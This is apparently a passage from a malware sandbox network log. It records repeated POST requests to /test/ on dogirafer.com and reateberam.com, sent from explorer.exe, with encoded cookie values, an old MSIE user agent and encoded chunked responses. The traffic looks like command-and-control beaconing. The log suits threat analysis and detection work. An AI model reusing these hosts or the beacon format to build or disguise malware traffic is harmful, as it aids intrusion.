                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14007&min_rtt=13907&rtt_var=5287&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=209966&cwnd=32&unsent_bytes=0&cid=5aca874b8741a559&ts=1607&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  14 | 192.168.2.5 | 50001 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:29 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnYgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:31 UTC | 791 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:31 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2VKnkmbrIXro8vboiQrFX0SmPcFH5F65oyn%2Fr6KGI6jb0%2FrQkCpmiszaKfpcULgEg%2Bm4qNyqO30tS16Z3T5jb25pnS%2F0s%2BwTDI4plLadjdpuAlG14GMTG%2B6KhLK%2F4AeM"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd218b291742fd-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1778&min_rtt=1749&rtt_var=714&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=1471774&cwnd=247&unsent_bytes=0&cid=a40c0605d0ab3b99&ts=1631&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  15 | 192.168.2.5 | 50002 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:32 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnYQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:34 UTC | 793 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:34 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F9VqhO1VuQaDoH1WUpLl%2FGS98rh5ogpLKLb%2Fl4C3GeZxnW9HVMonD%2BsjKcNKAyG6yahJ%2FQmgBseABiyjUBGfqL4Az3Xq0s%2Frqyet8XvufDWxujJm7uGkXaIy%2BItagERd"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd219e0db1ab1e-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=30481&min_rtt=14309&rtt_var=16461&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1052&delivery_rate=204067&cwnd=32&unsent_bytes=0&cid=39119e3bc3a163f7&ts=1621&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  16 | 192.168.2.5 | 50003 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:36 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnYAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:37 UTC | 787 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:37 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DPr0LOdrbeQwfVI1f6COcmptmE3iOdFxFmQW698pMaLeGjLwru%2FpSEBvMbF0juQPa%2Bp2F%2FXfbfmh94vf08nZ5dgRDD3X0l%2BXkH%2FLchvIlaKNHn2AEHkguOqE31fZf9g0"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd21b38831433a-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1716&rtt_var=643&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1052&delivery_rate=1701631&cwnd=241&unsent_bytes=0&cid=07d74bbd07e50989&ts=1621&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  17 | 192.168.2.5 | 50004 | 104.21.68.89 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:39 UTC | 414 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnZwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TudUNGNfWRLCRv+dQZsw==
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: dogirafer.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:41 UTC | 789 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:40 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l2JvCjHbQHhRa4qlUZ7DicwocyJ%2FjQuZc1tDkHelkFsjYiyDs5jf58qVWrRTR0g3Ei%2BqzbELbquGcqPEZReq1qz7A9c73fbBLU%2FffIpqZc47e%2BO71lKvL9E%2FukpYEztR"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd21c79f90236b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=50749&min_rtt=3151&rtt_var=29575&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1052&delivery_rate=926689&cwnd=172&unsent_bytes=0&cid=6c2fd9a841aa9f30&ts=1617&x=0"


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  18 | 192.168.2.5 | 50006 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:43 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:44 UTC | 789 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:44 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hW2VT0Tf42kdRJpZYMvXgc9Ogag6TJ5vr7EUGGn2GwM82YWEwvU5kdORkG8ekEE58MyPWt4zo5NUSwBuV4MGP12zYxzGiPXhPaPaxryv0ohctwWWW%2B%2BBNnsjMABGZkbIMw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd21e11a06ebbd-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=14188&min_rtt=14183&rtt_var=5329&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=205243&cwnd=32&unsent_bytes=0&cid=ed4390e4bed9a7ce&ts=810&x=0"
                                                                  2024-12-02 17:45:44 UTC | 343 | IN |
                                                                  Data Ascii: 150Py+eRMCy2IpvYBTdjWDjg3RHMknfByPCbfyxvyXPYmmcphSGpB6yiJiVjA1rJU4reZXo7F0gCru/sqJGtpevpMs/6E5XHmNE7MChfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kcw0AezjJxV+ZLLCfnUt58tB7VrYCxlO7E48NV4MNozMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1bR5
                                                                  2024-12-02 17:45:44 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  19 | 192.168.2.5 | 50007 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:45 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnZgqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:46 UTC | 792 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:46 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a%2BVaHXXdmaymv0nt%2FeJxcYLThx7RI943WZAtScAcxpbXuLpoJqrnyNdSC6zvBG%2BafBBhEF3MGt2wW3L2SzG72PxzuYVc3JAnTwYjQonwponApyQZj7TWJIT8q03g5hSfHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd21ef69beab2a-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=29426&min_rtt=13890&rtt_var=15883&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=210223&cwnd=32&unsent_bytes=0&cid=a5779f68228b3be9&ts=871&x=0"
                                                                  2024-12-02 17:45:46 UTC | 339 | IN |
                                                                  Data Ascii: 14cMyqURcq10YphYxzYh2Tgg3BGPk/RAyPCbPiytyDIKRib7xuPoA21j4bUizRoJU8ofJKOhV4kDLu4tO0CsZCupc82giZVHGdE7MDsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4EME2DO3mJHMSZbbGcnEtq49C6lLdCXZEikw+OVoBcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZN/9VRJ
                                                                  2024-12-02 17:45:46 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  20 | 192.168.2.5 | 50008 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:48 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnZQqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:48 UTC | 790 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:48 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n4Ker%2BpndsxtiGiXFJ4AU7TWiMtg%2FMa960yD5jHBseLoqxmgzdPvTWo2FVVuzcowoqZhB32H6FWRIARBxVyEH8yxKrsXdUdpJHStGvDNZqoRYtwZjv%2F677FWA8fYDbu6uQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd21fcef705e6a-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1771&min_rtt=1770&rtt_var=666&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=1639528&cwnd=214&unsent_bytes=0&cid=44e4753bd2401a85&ts=749&x=0"
                                                                  2024-12-02 17:45:48 UTC | 343 | IN |
                                                                  Data Ascii: 150PSSbQsuw24pvYxvYhGPhg3dGOEvfAijCaP2zvCHKZ2mcphSGpB6yiJiVjA1tJUYpfJLl7FsmDrG9t6lGsZKupco66k5SFGVM78amfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcA5A+zjKR9+bbHFf3Yp7stB71TfDhpC7E44N1gKPYXMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1aQp
                                                                  2024-12-02 17:45:48 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  21 | 192.168.2.5 | 50009 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:50 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnZAqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:51 UTC | 797 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:50 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ZGHr7Ez%2FrjWzq6Cl%2B%2FkIFSzG9oJXgJvL71AqV1yBatSL74LvU%2BfcPwpndSH8tNI5hb1vVMORzqIjPM9LXROjvZokraK9OvUoOCnNYhAS1SsI5RSZi%2BvL5o%2BXKKnmXdndQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd220b59d9ab63-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=13923&min_rtt=13911&rtt_var=5225&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1053&delivery_rate=209905&cwnd=32&unsent_bytes=0&cid=1beb4e4968beaae4&ts=900&x=0"
                                                                  2024-12-02 17:45:51 UTC | 339 | IN |
                                                                  Data Ascii: 14cOSWYQcSz2opjaxnfjGbpg3BOO0rXBSTCa/i3vSHLZmmcphSGpB6yiJiVjA1mLkYifJbo7FgmD7e2te0Nt5Opo84/giZRFGFP7sXsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4Fcw1Bu7lJnMZbrPCeXdh5odC5lHcAXZHikk8MF4AcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZN/NVRJ
                                                                  2024-12-02 17:45:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  22 | 192.168.2.5 | 50010 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:52 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnawqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:53 UTC | 799 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FGY%2Bwln367lELMbjJ%2BkApjnlYQHFk3YXA1%2BxSpTFM25th%2BHyaQbvTAMsoswFy5%2FG%2FeBhFXvxb84LNSyuRXH788hD5tVPyEUs5JUKzw1AGkyUSFfmu2wYceEluNIzGESaBg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd22188c364328-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=21199&min_rtt=1809&rtt_var=12303&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=1614151&cwnd=220&unsent_bytes=0&cid=c499705b81e5339c&ts=753&x=0"
                                                                  2024-12-02 17:45:53 UTC | 343 | IN |
                                                                  Data Ascii: 150OSWUR8Sx34pkZhjYh2Xhg3FHPELfDSLCavi3uCLFKRib7xuPoA21j4bUiz5pJUQrfJuOhl8nDba2su0IsJSmo8w4gidTHWFF6sbsDGl1dHEsQQn2uYSJDCHRq3cMNJkc4r84xUK0u/CbX2shoAmlBhv4FsAwAunnJXMSb7/HeXQtq4VA6lvZCh4pi085M1gIOsC9ev77bVeMe36xUXnWfgFXfybl2QBhSrcVl4+Vnq0DM8eZv9PeBf9WRZ
                                                                  2024-12-02 17:45:53 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  23 | 192.168.2.5 | 50011 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:54 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hnagqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:55 UTC | 790 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:55 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ooNR19ZAWOZtwAOtd4acpq9bHD3Z%2BpoAnmKSaRsZObihz5xuSCRFC3YqhrR0QZFtfo%2FJXJUyJsVY2zwDig35XzZfPNSjX5CaV4YMcilWqv%2B5RyUmpVONHX5f24E0EOs53A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd2225ba197c9f-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1794&min_rtt=1779&rtt_var=699&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=1053&delivery_rate=1532004&cwnd=213&unsent_bytes=0&cid=b13e7adbef4bc2ad&ts=802&x=0"
                                                                  2024-12-02 17:45:55 UTC | 347 | IN |
                                                                  Data Ascii: 154PiiYQMey24pgYRXQjGPkg3NKMk/eBCPCbPe6vi7IYWmcphSGpB6yiJiVjA1nJkUpfJXp7F8gAbW2s6lGt5espsE27E5cG2dM6cegfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcE4AOjlJRt+abbAc3Ik5stB6lTcCxtG7Ew1NV4PPInMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1SQZ
                                                                  2024-12-02 17:45:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  24 | 192.168.2.5 | 50012 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:57 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cookie: aXLYGobmm+hkYwqczCa1wndZbQ+OUCzeHv2wuiTNZSDQnRHz02mh6/ifwEVsJjYieJqQlQFhBbSp4ONZ656uso19uGMKTT4Y4pL8ZwxOVRsYT1b/oc3OT2Lds2xKacxaoas4xR7ou6vSRzRo9ly1QGSXQIxpW7TuY0lAKOKSLzN8upkVsQ8=
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                  Host: reateberam.com
                                                                  Content-Length: 0
                                                                  Cache-Control: no-cache
                                                                  2024-12-02 17:45:57 UTC | 788 | IN | HTTP/1.1 200 OK
                                                                  Date: Mon, 02 Dec 2024 17:45:57 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZMmzzuVWXJLx1U08e26PWtc3WnB66pQUdWv7X0qb6aC%2Fm00hMCijwymeYMnlsjcgsgobAI7ZkvD0AlsS1jxZeyRLyX5Nc0kDQf0ZhzwQTKXC2V0UD8akrCOemNEZUVMhoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ebd2235ecc0ac9c-YYZ
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=15979&min_rtt=14151&rtt_var=8964&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1053&delivery_rate=101452&cwnd=32&unsent_bytes=0&cid=a716180102c5a160&ts=1231&x=0"
                                                                  2024-12-02 17:45:57 UTC | 343 | IN |
                                                                  Data Ascii: 150OSiVRcC7tuZnah7agGCszXRLPknXAU6oaviyuSeAWB/S4BKLswqykcfTuDdtIE8pe/zkhl8gC7W//aIJtJOopcBR7CZWH2pL54+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzFEssyDOvhTh4VZb/Dej0l5o5G5lLdZxxDh0w/MF5EA7blIuf6XTWMInatVX6cIhQcPyXjzAh1TqNehs6b3rRJNNbFxvbiPPBXRJ
                                                                  2024-12-02 17:45:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  25 | 192.168.2.5 | 50013 | 172.67.217.190 | 443 | 1028 | C:\Windows\explorer.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  2024-12-02 17:45:59 UTC | 415 | OUT | POST /test/ HTTP/1.1
                                                                  Accept: */*
                                                                  Content-Type: application/x-www-form-urlencoded
